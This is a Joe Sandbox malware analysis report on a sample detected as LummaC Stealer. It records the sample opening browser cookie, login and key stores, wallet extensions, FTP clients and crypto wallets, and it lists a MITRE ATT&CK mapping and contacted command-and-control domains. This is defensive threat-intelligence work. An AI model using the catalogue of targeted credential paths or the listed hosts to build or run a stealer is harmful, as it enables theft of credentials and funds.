Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.js	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.json	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\FTPbox	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\FTPGetter	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\FTPInfo	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\ProgramData\SiteDesigner\3D-FTP	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\FTPRush	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\BJZFPPWAPT	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\BJZFPPWAPT	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\BJZFPPWAPT	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\BJZFPPWAPT	Jump to behavior

Source: Yara match	File source: 00000000.00000003.2089970639.00000000016DF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2112827223.00000000016DA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2089565968.00000000016DA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2174142658.00000000016EA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2134348789.00000000016DB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2111788836.00000000016DF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2174167356.00000000016F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2134730644.00000000016DC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2171451535.00000000016DA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 4208, type: MEMORYSTR

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: file.exe PID: 4208, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	2 Windows Management Instrumentation	1 DLL Side-Loading	1 Process Injection	34 Virtualization/Sandbox Evasion	2 OS Credential Dumping	1 Query Registry	Remote Services	1 Archive Collected Data	21 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	2 Command and Scripting Interpreter	Boot or Logon Initialization Scripts	1 DLL Side-Loading	1 Process Injection	LSASS Memory	761 Security Software Discovery	Remote Desktop Protocol	41 Data from Local System	2 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	1 Deobfuscate/Decode Files or Information	Security Account Manager	34 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	113 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	4 Obfuscated Files or Information	NTDS	2 Process Discovery	Distributed Component Object Model	Input Capture	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	12 Software Packing	LSA Secrets	1 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	223 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
file.exe	51%	Virustotal		Browse
file.exe	100%	Avira	TR/Crypt.XPACK.Gen
file.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label	Link
https://atten-supporse.biz/p	100%	Avira URL Cloud	malware
https://atten-supporse.biz/&&	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
atten-supporse.biz	104.21.64.1	true	false		high

Contacted URLs

Name	Malicious	Reputation
dare-curbys.biz	false	high
impend-differ.biz	false	high
covery-mover.biz	false	high
https://atten-supporse.biz/api	false	high
dwell-exclaim.biz	false	high
zinc-sneark.biz	false	high
formy-spill.biz	false	high
atten-supporse.biz	false	high
se-blurry.biz	false	high
print-vexer.biz	false	high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	file.exe, 00000000.00000003.2089675669.0000000005F29000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2089743305.0000000005F26000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	file.exe, 00000000.00000003.2089675669.0000000005F29000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2089743305.0000000005F26000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	file.exe, 00000000.00000003.2089675669.0000000005F29000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2089743305.0000000005F26000.00000004.00000800.00020000.00000000.sdmp	false		high
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi	file.exe, 00000000.00000003.2136702572.000000000170B000.00000004.00000020.00020000.00000000.sdmp	false		high
https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.	file.exe, 00000000.00000003.2136702572.000000000170B000.00000004.00000020.00020000.00000000.sdmp	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	file.exe, 00000000.00000003.2089675669.0000000005F29000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2089743305.0000000005F26000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.rootca1.amazontrust.com/rootca1.crl0	file.exe, 00000000.00000003.2135008741.0000000005F18000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	file.exe, 00000000.00000003.2089675669.0000000005F29000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2089743305.0000000005F26000.00000004.00000800.00020000.00000000.sdmp	false		high
http://ocsp.rootca1.amazontrust.com0:	file.exe, 00000000.00000003.2135008741.0000000005F18000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.ecosia.org/newtab/	file.exe, 00000000.00000003.2089675669.0000000005F29000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2089743305.0000000005F26000.00000004.00000800.00020000.00000000.sdmp	false		high
https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta	file.exe, 00000000.00000003.2136702572.000000000170B000.00000004.00000020.00020000.00000000.sdmp	false		high
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	file.exe, 00000000.00000003.2136351465.0000000006013000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ac.ecosia.org/autocomplete?q=	file.exe, 00000000.00000003.2089675669.0000000005F29000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2089743305.0000000005F26000.00000004.00000800.00020000.00000000.sdmp	false		high
https://atten-supporse.biz/apie	file.exe, 00000000.00000003.2111788836.00000000016DF000.00000004.00000020.00020000.00000000.sdmp	false		high
https://atten-supporse.biz/&&	file.exe, 00000000.00000003.2171451535.00000000016DA000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg	file.exe, 00000000.00000003.2136702572.000000000170B000.00000004.00000020.00020000.00000000.sdmp	false		high
http://crl.micro	file.exe, 00000000.00000003.2272354307.00000000016C9000.00000004.00000020.00020000.00000000.sdmp	false		high
https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg	file.exe, 00000000.00000003.2136702572.000000000170B000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f10	file.exe, 00000000.00000003.2174609302.0000000001701000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2174185636.00000000016FF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2174670298.0000000001704000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2174142658.00000000016EA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2171451535.00000000016DA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2174167356.00000000016F8000.00000004.00000020.00020000.00000000.sdmp	false		high
https://atten-supporse.biz/p	file.exe, 00000000.00000003.2272325974.00000000016DB000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://x1.c.lencr.org/0	file.exe, 00000000.00000003.2135008741.0000000005F18000.00000004.00000800.00020000.00000000.sdmp	false		high
http://x1.i.lencr.org/0	file.exe, 00000000.00000003.2135008741.0000000005F18000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	file.exe, 00000000.00000003.2089675669.0000000005F29000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2089743305.0000000005F26000.00000004.00000800.00020000.00000000.sdmp	false		high
https://atten-supporse.biz:443/apiicrosoft	file.exe, 00000000.00000002.2280254483.000000000165E000.00000004.00000020.00020000.00000000.sdmp	false		high
http://crt.rootca1.amazontrust.com/rootca1.cer0?	file.exe, 00000000.00000003.2135008741.0000000005F18000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref	file.exe, 00000000.00000003.2136702572.000000000170B000.00000004.00000020.00020000.00000000.sdmp	false		high
https://atten-supporse.biz:443/api	file.exe, 00000000.00000003.2279008440.000000000165E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2280254483.000000000165E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://atten-supporse.biz/	file.exe, 00000000.00000003.2272354307.00000000016D5000.00000004.00000020.00020000.00000000.sdmp	false		high
https://support.mozilla.org/products/firefoxgro.all	file.exe, 00000000.00000003.2136351465.0000000006013000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	file.exe, 00000000.00000003.2089675669.0000000005F29000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2089743305.0000000005F26000.00000004.00000800.00020000.00000000.sdmp	false		high
https://atten-supporse.biz/apii	file.exe, 00000000.00000003.2212526320.0000000001701000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2280541673.0000000001705000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2272282633.0000000001701000.00000004.00000020.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
104.21.64.1	atten-supporse.biz	United States		13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1572085
Start date and time:	2024-12-10 04:30:09 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 1s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
